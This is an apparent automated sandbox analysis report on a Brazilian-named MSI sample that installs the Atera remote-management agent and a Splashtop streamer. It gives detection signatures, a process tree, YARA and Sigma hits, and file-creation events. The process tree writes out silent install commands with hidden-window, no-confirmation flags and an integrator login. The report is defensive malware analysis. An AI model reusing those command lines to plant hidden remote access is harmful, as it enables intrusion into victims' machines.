Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Arquivo_4593167.msi

Overview

General Information

Sample name:Arquivo_4593167.msi
Analysis ID:1545758
MD5:2ba70a300e16d1b51bd103de907777d8
SHA1:9774343aeb3b6f06593fc84a59422ef3b8cce66b
SHA256:0d47740bf97710835ebe91ac545ff0da45d81b54dfb8e2dea485fe5a123ae468
Tags:AteraAgentfraudmsiuser-johnk3r
Infos:

Detection

AteraAgent
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AteraAgent
AI detected suspicious sample
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Installs Task Scheduler Managed Wrapper
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7012 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Arquivo_4593167.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7132 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3632 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0B94C8984E2657846CB3FC17409B05D4 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 2256 cmdline: rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 5780 cmdline: rundll32.exe "C:\Windows\Installer\MSIC961.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4508140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 2084 cmdline: rundll32.exe "C:\Windows\Installer\MSIDCAB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4512968 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 3320 cmdline: rundll32.exe "C:\Windows\Installer\MSIF4AD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4519093 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 4948 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • net.exe (PID: 7020 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 4504 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • taskkill.exe (PID: 4904 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sppsvc.exe (PID: 4904 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
    • AteraAgent.exe (PID: 2640 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2" MD5: 477293F80461713D51A98A24023D45E8)
    • msiexec.exe (PID: 7516 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 556B5128AD7072E16BEB10DB90B1A40C E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • _isA1FD.exe (PID: 7604 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E00D6CF4-4FC3-431C-B643-8FF5D1691F3C} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7636 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{92D3031C-81C4-4FED-8F50-F5E3BE9F3612} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7668 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4C499929-14EA-4E52-BDA5-131742626400} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7704 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6385CD88-DCB3-4881-A482-8EE7F96DDDE3} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7736 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8ABF8E23-F9FD-49C3-8B2D-36EBD8434563} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7776 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7808 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FB3E51D0-455D-47D0-B21A-C3DC48DCD266} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7844 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{AA5AA93B-7BA4-4056-819A-23A48FF3891F} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7876 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{035C7190-A369-4041-A248-C0E4DB43C54F} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7908 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B627E9BE-EB25-4498-B44A-CDE0D79185EC} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • cmd.exe (PID: 7948 cmdline: C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRServer.exe /T" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7996 cmdline: taskkill.exe /F /IM SRServer.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • cmd.exe (PID: 8028 cmdline: C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRApp.exe /T" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AteraAgent.exe (PID: 6200 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 1352 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 2916 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 2932 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 980 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3632 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 6768 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageSTRemote.exe (PID: 1016 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB MD5: 749C51599FBF82422791E0DF1C1E841C)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SplashtopStreamer.exe (PID: 7384 cmdline: "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1 MD5: F1356F7FBD37502B529D9BCD643FB7AB)
        • PreVerCheck.exe (PID: 7440 cmdline: "C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1 MD5: DF5EB1AF99091A902EFFA52463EDA084)
          • msiexec.exe (PID: 7460 cmdline: msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • AteraAgent.exe (PID: 1852 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 1516 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7280 cmdline: C:\Windows\System32\svchost.exe -k smphost MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLogJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
    C:\Windows\Temp\~DF6260B0A6EE189872.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
      C:\Windows\Temp\~DFF7EC8F46D19662E2.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
        C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dllJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
          C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 81 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000D.00000002.2266876260.0000020AA05F0000.00000004.00000020.00040000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
              00000018.00000002.2916644902.0000004DD77F5000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                  0000000D.00000002.2267142526.0000020AA07E1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                    0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                      Click to see the 165 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      20.2.AgentPackageAgentInformation.exe.1be62a40000.1.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                        12.0.AteraAgent.exe.1c5cb450000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                          20.0.AgentPackageAgentInformation.exe.1be62230000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                            20.0.AgentPackageAgentInformation.exe.1be62230000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                              33.0.AgentPackageSTRemote.exe.21719510000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security

                                Sigma Signatures

                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: SRCredentialProvider, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7516, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{97E1814E-5601-41c8-9971-10C319EF61CC}\(Default)
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3632, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ProcessId: 6768, ProcessName: cscript.exe
                                Sigma detected: Net.exe Execution
                                Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 4948, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 7020, ProcessName: net.exe
                                Sigma detected: Stop Windows Service Via Net.EXE
                                Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 4948, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 7020, ProcessName: net.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k smphost, CommandLine: C:\Windows\System32\svchost.exe -k smphost, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k smphost, ProcessId: 7280, ProcessName: svchost.exe

                                Suricata Signatures

                                No Suricata rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeReversingLabs: Detection: 20%
                                Multi AV Scanner detection for submitted file
                                Source: Arquivo_4593167.msiReversingLabs: Detection: 23%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.3% probability
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BB14D0 CryptProtectData,37_2_00BB14D0
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\sharedJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.AppJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Configuration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Intrinsics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-rtlsupport-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\msquic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.Client.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-interlocked-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Sockets.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceModel.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceProcess.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encodings.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\WindowsBase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-debug-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.DriveInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-localization-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Channels.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Expressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.MemoryMappedFiles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-sysinfo-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processenvironment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-stdio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.TypeConverter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.Vectors.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.ILGeneration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Primitives.dllJump to behavior
